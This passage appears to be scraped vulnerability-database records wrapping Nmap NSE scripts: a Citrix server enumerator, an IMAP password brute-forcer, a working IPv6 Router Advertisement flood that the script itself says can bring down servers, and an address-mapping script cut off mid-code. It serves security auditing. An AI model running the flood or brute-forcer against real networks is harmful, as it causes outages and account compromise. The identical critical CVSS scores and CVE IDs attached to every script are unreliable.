[nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2009-12-14T07:30:38", "type": "nmap", "title": "citrix-enum-servers NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-09-05T21:57:41", "id": "NMAP:CITRIX-ENUM-SERVERS.NSE", "href": "https://nmap.org/nsedoc/scripts/citrix-enum-servers.html", "sourceData": "local nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nExtracts a list of Citrix servers from the ICA Browser service.\n]]\n\n---\n-- @usage sudo ./nmap -sU --script=citrix-enum-servers -p 1604\n--\n-- @output\n-- PORT STATE SERVICE\n-- 1604/udp open unknown\n-- | citrix-enum-servers:\n-- | CITRIXSRV01\n-- |_ CITRIXSRV02\n--\n\n-- Version 0.2\n\n-- Created 11/26/2009 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>\n-- Revised 11/26/2009 - v0.2 - minor packet documentation\n\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\"}\n\n\nportrule = shortport.portnumber(1604, \"udp\")\n\n--\n-- process the response from the server\n-- @param response string, complete server response\n-- @return string row delimited with \\n containing all published applications\n--\nfunction process_server_response(response)\n\n local packet_len, pos = string.unpack(\"<I2\", response)\n local server_name\n local server_list = {}\n\n if packet_len < 40 then\n return\n end\n\n -- the list of published applications starts at offset 40\n local offset = 41\n\n while offset < packet_len do\n server_name, pos = string.unpack(\"z\", response:sub(offset))\n offset = offset + pos - 1\n table.insert(server_list, server_name)\n end\n\n return server_list\n\nend\n\n\naction = function(host, port)\n\n local packet, counter, socket\n local query = {}\n local server_list = {}\n\n --\n -- Packets were intercepted from the Citrix Program Neighborhood client\n -- They are used to query a server for its list of published applications\n --\n -- We're really not interested in the responses to the first two packets\n -- The third response contains the list of published applications\n -- I couldn't find any documentation on this protocol so I'm providing\n -- some brief information for the bits and bytes this script uses.\n --\n -- Spec. of response to query[2] that contains a list of published apps\n --\n -- offset size content\n -- -------------------------\n -- 0 16-bit Length\n -- 12 32-bit Server IP (not used here)\n -- 30 8-bit Last packet(1), More packets(0)\n -- 40 - null-separated list of applications\n --\n query[0] = string.char(\n 0x1e, 0x00, -- Length: 30\n 0x01, 0x30, 0x02, 0xfd, 0xa8, 0xe3, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00\n )\n\n query[1] = string.char(\n 0x2a, 0x00, -- Length: 42\n 0x01, 0x32, 0x02, 0xfd, 0xa8, 0xe3, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x01, 0x00, 0x02, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00\n )\n\n counter = 0\n\n socket = nmap.new_socket()\n socket:set_timeout(5000)\n\n local try = nmap.new_try(function() socket:close() end)\n try(socket:connect(host, port))\n\n -- send the two first packets and never look back\n repeat\n try(socket:send(query[counter]))\n packet = try(socket:receive())\n counter = counter + 1\n until (counter>#query)\n\n -- process the first response\n server_list = process_server_response( packet )\n\n --\n -- the byte at offset 31 in the response has a really magic function\n -- if it is set to zero (0) we have more response packets to process\n -- if it is set to one (1) we have arrived at the last packet of our journey\n --\n while packet:sub(31,31) ~= \"\\x01\" do\n packet = try( socket:receive() )\n local tmp_table = process_server_response( packet )\n\n for _, v in ipairs(tmp_table) do\n table.insert(server_list, v)\n end\n end\n\n if #server_list>0 then\n nmap.set_port_state(host, port, \"open\")\n end\n\n socket:close()\n\n return stdnse.format_output(true, server_list)\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:41:52", "description": "Performs brute force password auditing against IMAP servers using either LOGIN, PLAIN, CRAM-MD5, DIGEST-MD5 or NTLM authentication.\n\n## Script Arguments \n\n#### imap-brute.auth \n\nauthentication mechanism to use LOGIN, PLAIN, CRAM-MD5, DIGEST-MD5 or NTLM\n\n#### passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb \n\nSee the documentation for the [unpwdb](<../lib/unpwdb.html#script-args>) library. \n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. \n\n#### brute.credfile, brute.delay, brute.emptypass, brute.firstonly, brute.guesses, brute.mode, brute.passonly, brute.retries, brute.start, brute.threads, brute.unique, brute.useraspass \n\nSee the documentation for the [brute](<../lib/brute.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p 143,993 --script imap-brute <host>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 143/tcp open imap syn-ack\n | imap-brute:\n | Accounts\n | braddock:jules - Valid credentials\n | lane:sniper - Valid credentials\n | parker:scorpio - Valid credentials\n | Statistics\n |_ Performed 62 guesses in 10 seconds, average tps: 6\n \n\n## Requires \n\n * [brute](<../lib/brute.html>)\n * [coroutine](<>)\n * [creds](<../lib/creds.html>)\n * [imap](<../lib/imap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-07-21T10:04:30", "type": "nmap", "title": "imap-brute NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:IMAP-BRUTE.NSE", "href": "https://nmap.org/nsedoc/scripts/imap-brute.html", "sourceData": "local brute = require \"brute\"\nlocal coroutine = require \"coroutine\"\nlocal creds = require \"creds\"\nlocal imap = require \"imap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nPerforms brute force password auditing against IMAP servers using either LOGIN, PLAIN, CRAM-MD5, DIGEST-MD5 or NTLM authentication.\n]]\n\n---\n-- @usage\n-- nmap -p 143,993 --script imap-brute <host>\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 143/tcp open imap syn-ack\n-- | imap-brute:\n-- | Accounts\n-- | braddock:jules - Valid credentials\n-- | lane:sniper - Valid credentials\n-- | parker:scorpio - Valid credentials\n-- | Statistics\n-- |_ Performed 62 guesses in 10 seconds, average tps: 6\n--\n-- @args imap-brute.auth authentication mechanism to use LOGIN, PLAIN,\n-- CRAM-MD5, DIGEST-MD5 or NTLM\n\n-- Version 0.1\n-- Created 07/15/2011 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>\n\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"brute\", \"intrusive\"}\n\nportrule = shortport.port_or_service({143,993}, {\"imap\",\"imaps\"})\n\nlocal mech\n\n-- By using this connectionpool we don't need to reconnect the socket\n-- for each attempt.\nConnectionPool = {}\n\nDriver =\n{\n\n -- Creates a new driver instance\n -- @param host table as received by the action method\n -- @param port table as received by the action method\n -- @param pool an instance of the ConnectionPool\n new = function(self, host, port, pool)\n local o = { host = host, port = port }\n setmetatable(o, self)\n self.__index = self\n return o\n end,\n\n -- Connects to the server (retrieves a connection from the pool)\n connect = function( self )\n self.helper = ConnectionPool[coroutine.running()]\n if ( not(self.helper) ) then\n self.helper = imap.Helper:new( self.host, self.port )\n self.helper:connect()\n ConnectionPool[coroutine.running()] = self.helper\n end\n return true\n end,\n\n -- Attempts to login to the server\n -- @param username string containing the username\n -- @param password string containing the password\n -- @return status true on success, false on failure\n -- @return brute.Error on failure and creds.Account on success\n login = function( self, username, password )\n local status, err = self.helper:login( username, password, mech )\n if ( status ) then\n self.helper:close()\n self.helper:connect()\n return true, creds.Account:new(username, password, creds.State.VALID)\n end\n if ( err:match(\"^ERROR: Failed to .* data$\") ) then\n self.helper:close()\n self.helper:connect()\n local err = brute.Error:new( err )\n -- This might be temporary, set the retry flag\n err:setRetry( true )\n return false, err\n end\n return false, brute.Error:new( \"Incorrect password\" )\n end,\n\n -- Disconnects from the server (release the connection object back to\n -- the pool)\n disconnect = function( self )\n return true\n end,\n\n}\n\nlocal function fail (err) return stdnse.format_output(false, err) end\n\naction = function(host, port)\n\n -- Connects to the server and retrieves the capabilities so that\n -- authentication mechanisms can be determined\n local helper = imap.Helper:new(host, port)\n local status = helper:connect()\n if (not(status)) then return fail(\"Failed to connect to the server.\") end\n local status, capabilities = helper:capabilities()\n if (not(status)) then return fail(\"Failed to retrieve capabilities.\") end\n\n -- check if an authentication mechanism was provided or try\n -- try them in the mech_prio order\n local mech_prio = stdnse.get_script_args(\"imap-brute.auth\")\n mech_prio = ( mech_prio and { mech_prio } ) or\n { \"LOGIN\", \"PLAIN\", \"CRAM-MD5\", \"DIGEST-MD5\", \"NTLM\" }\n\n -- iterates over auth mechanisms until a valid mechanism is found\n for _, m in ipairs(mech_prio) do\n if ( m == \"LOGIN\" and not(capabilities.LOGINDISABLED)) then\n mech = \"LOGIN\"\n break\n elseif ( capabilities[\"AUTH=\" .. m] ) then\n mech = m\n break\n end\n end\n\n -- if no mechanisms were found, abort\n if ( not(mech) ) then\n return fail(\"No suitable authentication mechanism was found\")\n end\n\n local engine = brute.Engine:new(Driver, host, port)\n engine.options.script_name = SCRIPT_NAME\n local result\n status, result = engine:start()\n\n for _, helper in pairs(ConnectionPool) do helper:close() end\n\n return result\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:41:29", "description": "Generates a flood of Router Advertisements (RA) with random source MAC addresses and IPv6 prefixes. Computers, which have stateless autoconfiguration enabled by default (every major OS), will start to compute IPv6 suffix and update their routing table to reflect the accepted announcement. This will cause 100% CPU usage on Windows and platforms, preventing to process other application requests. \n\nVulnerable platforms: \n\n * All Cisco IOS ASA with firmware < November 2010 \n * All Netscreen versions supporting IPv6 \n * Windows 2000/XP/2003/Vista/7/2008/8/2012 \n * All FreeBSD versions \n * All NetBSD versions \n * All Solaris/Illumos versions \n\nSecurity advisory: <http://www.mh-sec.de/downloads/mh-RA_flooding_CVE-2010-multiple.txt>\n\nWARNING: This script is dangerous and is very likely to bring down a server or network appliance. It should not be run in a production environment unless you (and, more importantly, the business) understand the risks! \n\nAdditional documents: <https://tools.ietf.org/rfc/rfc6104.txt>\n\n## Script Arguments \n\n#### ipv6-ra-flood.interface \n\ndefines interface we should broadcast on\n\n#### ipv6-ra-flood.timeout \n\nruns the script until the timeout is reached (default: 30s). If timeout is zero, the script will run forever.\n\n## Example Usage \n \n \n nmap -6 --script ipv6-ra-flood.nse\n nmap -6 --script ipv6-ra-flood.nse --script-args 'interface=<interface>'\n nmap -6 --script ipv6-ra-flood.nse --script-args 'interface=<interface>,timeout=10s'\n\n## Requires \n\n * [ipOps](<../lib/ipOps.html>)\n * [nmap](<../lib/nmap.html>)\n * [packet](<../lib/packet.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [os](<>)\n * [rand](<../lib/rand.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-09-20T00:50:05", "type": "nmap", "title": "ipv6-ra-flood NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2019-06-27T19:13:41", "id": "NMAP:IPV6-RA-FLOOD.NSE", "href": "https://nmap.org/nsedoc/scripts/ipv6-ra-flood.html", "sourceData": "local ipOps = require \"ipOps\"\nlocal nmap = require \"nmap\"\nlocal packet = require \"packet\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal os = require \"os\"\nlocal rand = require \"rand\"\n\ndescription = [[\nGenerates a flood of Router Advertisements (RA) with random source MAC\naddresses and IPv6 prefixes. Computers, which have stateless autoconfiguration\nenabled by default (every major OS), will start to compute IPv6 suffix and\nupdate their routing table to reflect the accepted announcement. This will\ncause 100% CPU usage on Windows and platforms, preventing to process other\napplication requests.\n\nVulnerable platforms:\n* All Cisco IOS ASA with firmware < November 2010\n* All Netscreen versions supporting IPv6\n* Windows 2000/XP/2003/Vista/7/2008/8/2012\n* All FreeBSD versions\n* All NetBSD versions\n* All Solaris/Illumos versions\n\nSecurity advisory: http://www.mh-sec.de/downloads/mh-RA_flooding_CVE-2010-multiple.txt\n\nWARNING: This script is dangerous and is very likely to bring down a server or\nnetwork appliance. It should not be run in a production environment unless you\n(and, more importantly, the business) understand the risks!\n\nAdditional documents: https://tools.ietf.org/rfc/rfc6104.txt\n]]\n\n---\n-- @args ipv6-ra-flood.interface defines interface we should broadcast on\n-- @args ipv6-ra-flood.timeout runs the script until the timeout is reached\n-- (default: 30s). If timeout is zero, the script will run forever.\n--\n-- @usage\n-- nmap -6 --script ipv6-ra-flood.nse\n-- nmap -6 --script ipv6-ra-flood.nse --script-args 'interface=<interface>'\n-- nmap -6 --script ipv6-ra-flood.nse --script-args 'interface=<interface>,timeout=10s'\n\nauthor = \"Adam \u0160tevko\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"dos\", \"intrusive\"}\n\ntry = nmap.new_try()\n\nprerule = function()\n if nmap.address_family() ~= \"inet6\" then\n stdnse.debug1(\"is IPv6 compatible only.\")\n return false\n end\n\n if not nmap.is_privileged() then\n stdnse.debug1(\"Running %s needs root privileges.\", SCRIPT_NAME)\n return false\n end\n\n if not stdnse.get_script_args(SCRIPT_NAME .. \".interface\") and not nmap.get_interface() then\n stdnse.debug1(\"No interface was selected, aborting...\")\n return false\n end\n\n return true\nend\n\nlocal function get_interface()\n local arg_interface = stdnse.get_script_args(SCRIPT_NAME .. \".interface\") or nmap.get_interface()\n\n local if_table = nmap.get_interface_info(arg_interface)\n\n if if_table and ipOps.ip_to_str(if_table.address) and if_table.link == \"ethernet\" then\n return if_table.device\n else\n stdnse.debug1(\"Interface %s not supported or not properly configured, exiting...\", arg_interface)\n end\nend\n\n--- Generates random MAC address\n-- @return mac string containing random MAC address\nlocal function random_mac()\n return \"\\x00\\xb4\" .. rand.random_string(4)\nend\n\n--- Generates random IPv6 prefix\n-- @return prefix string containing random IPv6 /64 prefix\nlocal function get_random_prefix()\n return \"\\x2a\\x01\" .. rand.random_string(6) .. (\"\\0\"):rep(8)\nend\n\n--- Build an ICMPv6 payload of Router Advertisement.\n-- @param mac_src six-byte string of the source MAC address.\n-- @param prefix 16-byte string of IPv6 address.\n-- @param prefix_len integer that represents the length of the prefix.\n-- @param valid_time integer that represents the valid time of the prefix.\n-- @param preferred_time integer that represents the preferred time of the prefix.\n-- @param mtu integer that represents MTU of the link\n-- @return icmpv6_payload string representing ICMPv6 RA payload\n\nlocal function build_router_advert(mac_src,prefix,prefix_len,valid_time,preferred_time, mtu)\n local ra_msg = string.char(0x0, --cur hop limit\n 0x08, --flags\n 0x00,0x00, --router lifetime\n 0x00,0x00,0x00,0x00, --reachable time\n 0x00,0x00,0x00,0x00) --retrans timer\n\n local mtu_option_msg = \"\\0\\0\" .. -- reserved\n packet.numtostr32(mtu) -- MTU\n\n local prefix_option_msg = string.char(prefix_len, 0xc0) .. --flags: Onlink, Auto\n packet.set_u32(\"....\", 0, valid_time) .. -- valid lifetime\n packet.set_u32(\"....\", 0, preferred_time) .. -- preferred lifetime\n \"\\0\\0\\0\\0\" .. --unknown\n prefix\n\n local icmpv6_mtu_option = packet.Packet:set_icmpv6_option(packet.ND_OPT_MTU, mtu_option_msg)\n local icmpv6_prefix_option = packet.Packet:set_icmpv6_option(packet.ND_OPT_PREFIX_INFORMATION, prefix_option_msg)\n local icmpv6_src_link_option = packet.Packet:set_icmpv6_option(packet.ND_OPT_SOURCE_LINKADDR, mac_src)\n\n local icmpv6_payload = ra_msg .. icmpv6_mtu_option .. icmpv6_prefix_option .. icmpv6_src_link_option\n\n return icmpv6_payload\nend\n\n--- Broadcasting on the selected interface\n-- @param iface table containing interface information\nlocal function broadcast_on_interface(iface)\n stdnse.verbose1(\"Starting on interface \" .. iface)\n\n -- packet counter\n local counter = 0\n\n local arg_timeout = stdnse.parse_timespec(stdnse.get_script_args(SCRIPT_NAME..\".timeout\"))\n arg_timeout = arg_timeout or 30\n\n local dnet = nmap.new_dnet()\n\n try(dnet:ethernet_open(iface))\n\n local dst_mac = packet.mactobin(\"33:33:00:00:00:01\")\n local dst_ip6_addr = ipOps.ip_to_str(\"ff02::1\")\n\n local prefix_len = 64\n\n --- maximum possible value of 4-byte integer\n local valid_time = tonumber(0xffffffff)\n local preferred_time = tonumber(0xffffffff)\n\n local mtu = 1500\n\n local start, stop = os.time()\n\n while true do\n\n local src_mac = random_mac()\n local src_ip6_addr = packet.mac_to_lladdr(src_mac)\n\n local prefix = get_random_prefix()\n\n local packet = packet.Frame:new()\n\n packet.mac_src = src_mac\n packet.mac_dst = dst_mac\n packet.ip_bin_src = src_ip6_addr\n packet.ip_bin_dst = dst_ip6_addr\n\n local icmpv6_payload = build_router_advert(src_mac, prefix, prefix_len, valid_time, preferred_time, mtu)\n packet:build_icmpv6_header(134, 0, icmpv6_payload)\n packet:build_ipv6_packet()\n packet:build_ether_frame()\n\n try(dnet:ethernet_send(packet.frame_buf))\n\n counter = counter + 1\n\n if arg_timeout and arg_timeout > 0 and arg_timeout <= os.time() - start then\n stop = os.time()\n break\n end\n end\n\n if counter > 0 then\n stdnse.debug1(\"generated %d packets in %d seconds.\", counter, stop - start)\n end\nend\n\nfunction action()\n local interface = get_interface()\n\n broadcast_on_interface(interface)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:33:54", "description": "This script runs in the pre-scanning phase to map IPv4 addresses onto IPv6 networks and add them to the scan queue. \n\nThe technique is more general than what is technically termed \"IPv4-mapped IPv6 addresses.\" The lower 4 bytes of the IPv6 network address are replaced with the 4 bytes of IPv4 address. When the IPv6 network is ::ffff:0:0/96, then the script generates IPv4-mapped IPv6 addresses. When the network is ::/96, then it generates IPv4-compatible IPv6 addresses.\n\n## Script Arguments \n\n#### targets-ipv6-map4to6.IPv4Hosts \n\nThis must have at least one IPv4 Host for the script be able to work (Ex. 192.168.1.1 or { 192.168.1.1, 192.168.2.2 } ) or Subnet Addresses ( 192.168.1.0/24 or { 192.168.1.0/24, 192.168.2.0/24 } )\n\n#### targets-ipv6-subnet \n\nTable/single IPv6 address with prefix (Ex. 2001:db8:c0ca::/48 or { 2001:db8:c0ca::/48, 2001:db8:FEA::/48 })\n\n#### max-newtargets, newtargets \n\nSee the documentation for the [target](<../lib/target.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -6 --script targets-ipv6-map4to6 --script-args newtargets,targets-ipv6-map4to6.IPv4Hosts={192.168.1.0/24},targets-ipv6-subnet={2001:db8:c0ca::/64}\n \n\n## Script Output \n \n \n Pre-scan script results:\n | targets-ipv6-map4to6:\n | node count: 256\n | addresses:\n |_ 2001:db8:c0ca:0:0:0:c0a8:100/120\n \n\n## Requires \n\n * [ipOps](<../lib/ipOps.html>)\n * [nmap](<../lib/nmap.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [stringaux](<../lib/stringaux.html>)\n * [table](<>)\n * [target](<../lib/target.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2014-12-03T16:02:16", "type": "nmap", "title": "targets-ipv6-map4to6 NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:TARGETS-IPV6-MAP4TO6.NSE", "href": "https://nmap.org/nsedoc/scripts/targets-ipv6-map4to6.html", "sourceData": "local ipOps = require \"ipOps\"\nlocal nmap = require \"nmap\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal stringaux = require \"stringaux\"\nlocal table = require \"table\"\nlocal target = require \"target\"\n\ndescription = [[\nThis script runs in the pre-scanning phase to map IPv4 addresses onto IPv6\nnetworks and add them to the scan queue.\n\nThe technique is more general than what is technically termed \"IPv4-mapped IPv6\naddresses.\" The lower 4 bytes of the IPv6 network address are replaced with the\n4 bytes of IPv4 address. When the IPv6 network is ::ffff:0:0/96, then the\nscript generates IPv4-mapped IPv6 addresses. When the network is ::/96, then it\ngenerates IPv4-compatible IPv6 addresses.\n]]\n\n---\n-- @usage\n-- nmap -6 --script targets-ipv6-map4to6 --script-args newtargets,targets-ipv6-map4to6.IPv4Hosts={192.168.1.0/24},targets-ipv6-subnet={2001:db8:c0ca::/64}\n--\n-- @output\n-- Pre-scan script results:\n-- | targets-ipv6-map4to6:\n-- | node count: 256\n-- | addresses:\n-- |_ 2001:db8:c0ca:0:0:0:c0a8:100/120\n--\n-- @args targets-ipv6-map4to6.IPv4Hosts This must have at least one IPv4\n-- Host for the script be able to work\n-- (Ex. 192.168.1.1 or\n-- { 192.168.1.1, 192.168.2.2 } ) or Subnet\n-- Addresses ( 192.168.1.0/24 or\n-- { 192.168.1.0/24, 192.168.2.0/24 } )\n--\n-- @args targets-ipv6-subnet Table/single IPv6 address with prefix\n-- (Ex. 2001:db8:c0ca::/48 or\n-- { 2001:db8:c0ca::/48, 2001:db8:FEA::/48 })\n--\n-- @xmloutput\n-- <elem key=\"node count\">256</elem>\n-- <table key=\"addresses\">\n-- <elem>2001:db8:c0ca:0:0:0:c0a8:100/120</elem>\n-- </table>\n\n--\n-- Version 1.4\n-- Update 01/12/2014 - V 1.4 Update for inclusion in Nmap by Daniel Miller\n-- Update 05/05/2014 - V 1.3 Eliminate the Host phase.\n-- Update 05/05/2014 - V 1.2 Minor corrections and standardization.\n-- Update 18/10/2013 - V 1.1 Added SaveMemory option\n-- Update 29/03/2013 - V 1.0 Functional script\n-- Created 28/03/2013 - v0.1 Created by Ra\u00fal Fuentes <ra.fuentess.sam+nmap@gmail.com>\n--\n\nauthor = \"Ra\u00fal Armando Fuentes Samaniego\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\n \"discovery\",\n}\n\nlocal function split_prefix (net)\n local split = stringaux.strsplit(\"/\", net)\n return split[1], tonumber(split[2])\nend\n---\n-- This function will add all the list of IPv4 host to IPv6\n--\n-- The most normal is returning X:X:X:X::Y.Y.Y.Y/128\n-- The conversion is going to be totally IPv6 syntax (we are going to\n-- concatenate strings).\n-- @param IPv6_Network A IPv6 Address ( X:X:X:X::/YY )\n-- @param IPv4SHosts A IPv4 String can be: X.X.X.X or X.X.X.X/YY\n-- @param addr_table A table to hold the generated addresses.\n-- @return Number Total successfully nodes added to the scan.\n-- @return Error A warning if something happened. (Nil otherwise)\nlocal From_4_to_6 = function (IPv6_Network, IPv4SHosts, addr_table)\n\n --We check if the PRefix are OK, anything less than 96 is fine\n local v6_base, IPv6_Prefix = split_prefix(IPv6_Network)\n if IPv6_Prefix > 96 then\n return 0, string.format(\"The IPv6 subnet %s can't support a direct Mapping 4 to 6.\", IPv6_Network)\n end\n\n local sBin6, sError = ipOps.ip_to_bin(v6_base)\n if sBin6 == nil then\n return 0, sError\n end\n\n -- two options: String or Table, the bes thing to do: make string Table\n local tTabla\n if type(IPv4SHosts) == \"table\" then\n tTabla = IPv4SHosts\n else\n tTabla = { IPv4SHosts }\n end\n\n stdnse.debug1(\"Total IPv4 objects to analyze: %d for IPv6 subnet %s\",\n #tTabla, IPv6_Network)\n\n local iTotal = 0\n for _, Host in ipairs(tTabla) do\n\n\n stdnse.debug2(\"IPv4 Object: %s\", Host)\n\n local v4base, prefix = split_prefix(Host)\n\n local sBin4\n sBin4, sError = ipOps.ip_to_bin(v4base)\n if sBin4 == nil then\n return 0, sError\n end\n\n local IPAux\n IPAux, sError = ipOps.bin_to_ip(sBin6:sub(1, 96) .. sBin4)\n if prefix then\n prefix = prefix + (128 - 32) -- adjust for different address lengths\n IPAux = string.format(\"%s/%d\", IPAux, prefix)\n else\n prefix = 128\n end\n\n stdnse.debug2(\"IPv6 address: %s\", IPAux)\n\n addr_table[#addr_table+1] = IPAux\n if target.ALLOW_NEW_TARGETS then\n local bool\n bool, sError = target.add(IPAux)\n if bool then\n iTotal = iTotal + 2^(128 - prefix)\n else\n stdnse.debug1(\"Error adding node %s: %s\", IPAux, sError)\n end\n else\n iTotal = iTotal + 2^(128 - prefix)\n end\n\n end\n\n return iTotal\nend\n\nlocal IPv4Sub = stdnse.get_script_args(SCRIPT_NAME .. \".IPv4Hosts\")\nlocal IPv6User = stdnse.get_script_args(\"targets-ipv6-subnet\")\n---\n-- We populated the host discovery list.\nlocal Prescanning = function ()\n\n local errors = {}\n local tSalida = {\n Nodos = 0,\n addrs = {},\n }\n local Grantotal = 0\n\n stdnse.debug2(\"Beginning the work.\")\n\n if type(IPv6User) == \"string\" then\n IPv6User = { IPv6User }\n end\n\n -- TODO: Gather IPv6 subnets from other sources.\n -- This was implemented in the original version of the script, but stripped\n -- for now until the other scripts are integrated.\n -- http://seclists.org/nmap-dev/2013/q4/285\n for _, IPv6_Subnet in ipairs(IPv6User) do\n stdnse.debug1(\"Processing %s\", IPv6_Subnet)\n local IPv6Host, sError = From_4_to_6(IPv6_Subnet, IPv4Sub, tSalida.addrs)\n if sError ~= nil then\n stdnse.debug1( \"ERROR: One IPv6 subnet wasn't translated\")\n errors[#errors+1] = sError\n end\n if IPv6Host then\n -- We need to concatenate the new nodes\n Grantotal = Grantotal + 